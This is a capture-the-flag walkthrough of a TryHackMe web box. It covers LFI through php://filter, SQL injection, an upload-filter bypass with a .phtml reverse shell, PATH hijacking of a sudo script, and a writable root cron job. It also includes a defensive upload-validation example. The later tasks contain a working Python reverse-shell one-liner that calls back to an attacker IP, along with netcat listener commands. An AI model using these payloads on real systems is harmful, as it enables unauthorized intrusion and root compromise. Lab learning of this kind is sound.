TryHackMe - Babarus | Web | Medium UNDER DEVELOPMENT

Difficulty: Medium  |  Category: Web

Babarus is an excellent box that tests your enumeration skills, your understanding of web vulnerabilities, and your ability to abuse Linux system misconfigurations. It's my first CTF, and all feedback and thoughts are welcome; drop 'em here: csamarok@babarospwns.cc. Let's dive in.


[+] Task 1 — Initial Access & Web Exploitation

Enumeration

We start with a standard Nmap scan to see what ports are open on the target machine.

nmap <MACHINE_IP>

The scan reveals that port 80 (HTTP) is open, hosting the Babarus employee portal.

Local File Inclusion (LFI)

Navigating through the web portal, we notice the URL structure uses a parameter to load different pages (e.g., ?page=status.php). This is a classic indicator of a potential Local File Inclusion vulnerability. We can test this by attempting to read internal system files.

Including a PHP file directly would execute it rather than show it, so we use the php://filter wrapper to Base64-encode the source before it is returned. That way it reaches the browser as text we can read:

http://<MACHINE_IP>/index.php?page=php://filter/convert.base64-encode/resource=login

Decoding the Base64 output reveals the backend code structure.

SQL Injection (SQLi)

Further enumeration reveals an endpoint interacting with the database. We can test for SQL Injection by capturing the request and using SQLMap on it.

This successfully dumps the database, which contains two users, UnderVenice and JammerDinos, along with the MD5 hashes of their passwords. Cracking the first hash with CrackStation or Hashcat reveals the password.

Bypassing the Upload Filter

With credentials in hand, we log in to the portal, which allows uploading a profile picture. The application tries to block malicious files by rejecting the .php extension only. However, Apache is misconfigured so that alternative PHP extensions are still passed to the PHP handler and executed.

We rename our standard PHP reverse shell from shell.php to shell.phtml, upload it, and navigate to the uploads directory. We catch the reverse shell on our netcat listener.

nc -lvnp 4444

We now have a shell as the www-data user, so we grab the web flag: THM{WEB_FLAG}
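The upload filter bypassed above is worth looking at from the defender's side. The following is an added illustration, not code from the box or from this writeup: the portal's real source is not shown, so the blocklist is reconstructed from the observed behaviour (only .php rejected), and it is placed next to an allowlist-based check with content sniffing and a server-chosen file name.

```python
import os
import secrets
from typing import Optional

# Constructed sample uploads (not taken from the box): a minimal PNG header and a PHP stub.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php echo 'hi'; ?>"


def blocklist_allows(filename: str) -> bool:
    """Filter as the portal appears to behave (reconstructed): only '.php' is rejected.
    Any other extension Apache maps to the PHP handler (.phtml, .phar, ...) gets through."""
    return os.path.splitext(filename)[1].lower() != ".php"


# Allowed image extensions and the magic bytes their content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",  # covers GIF87a and GIF89a
}


def allowlist_allows(filename: str, data: bytes) -> bool:
    """Accept only a single allowlisted image extension whose content matches it.
    Everything else, including .phtml and double extensions, is rejected."""
    name, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if not name or "." in name or ext not in ALLOWED:
        return False  # no name, double extension (shell.php.png), or not an image type
    return data.startswith(ALLOWED[ext])


def safe_stored_name(filename: str, data: bytes) -> Optional[str]:
    """Return a random server-chosen name for an accepted upload, or None if rejected.
    The client-supplied base name never reaches the filesystem."""
    if not allowlist_allows(filename, data):
        return None
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```

The application-level check should be paired with Apache configuration that does not hand files in the uploads directory to the PHP handler at all, whatever their extension.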


[+] Task 2 — Lateral Movement

Our first goal is to escalate to a standard user account. Checking our basic privileges with sudo -l yields interesting results:

Matching Defaults entries for www-data on babarus:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on babarus:
    (dev_venis) EXTENV: NOPASSWD: /opt/maintenance/cleanup.sh

We can run cleanup.sh as the user dev_venis without a password. Let's inspect the contents of the script:

cat /opt/maintenance/cleanup.sh

Inside the script, we notice it calls the gzip command by bare name rather than by its absolute path (/bin/gzip), so the binary is resolved through PATH at run time. This makes the script vulnerable to PATH manipulation.

PATH Hijacking

We can create a malicious executable named gzip in our current directory, add it to our PATH, and force the script to execute our payload instead of the real gzip binary.

cd /tmp
echo "/bin/bash" > gzip
chmod +x gzip
export PATH=/tmp:$PATH
sudo -u dev_venis /opt/maintenance/cleanup.sh

The script runs, calls our fake gzip, and drops us into a shell as dev_venis. We can now claim the user flag.

THM{USER_FLAG}

[+] Task 3 — Privilege Escalation

Now that we are dev_venis, we need to find a path to root. Running the id command shows that our user belongs to an unusual secondary group:

uid=1000(dev_venis) gid=1000(dev_venis) groups=1000(dev_venis),1001(system-monitors)

We can search the file system for any files owned by this custom group:

find / -group system-monitors -type f 2>/dev/null

This reveals a Python script: /usr/local/scripts/healthcheck.py. By monitoring background processes with a tool like pspy, we discover this script is run by a cron job as root every minute.

Abusing Writable Cron Jobs

Checking the file permissions (ls -la) shows that the system-monitors group has write access to the script. Since it runs as root every minute, we can simply append a reverse shell payload to the end of the Python file.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_VPN_IP",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /usr/local/scripts/healthcheck.py

We set up a new netcat listener on port 4445, wait less than a minute for the cron job to trigger, and we receive our root shell!

root@babarus:~# cat /root/root.txt
THM{ROOT_FLAG}

[+] Conclusion

Babarus highlights the dangers of insufficient input validation leading to LFI and SQLi, the importance of strict extension allowlists in upload filters, and why developers must always use absolute paths in scripts running with elevated privileges.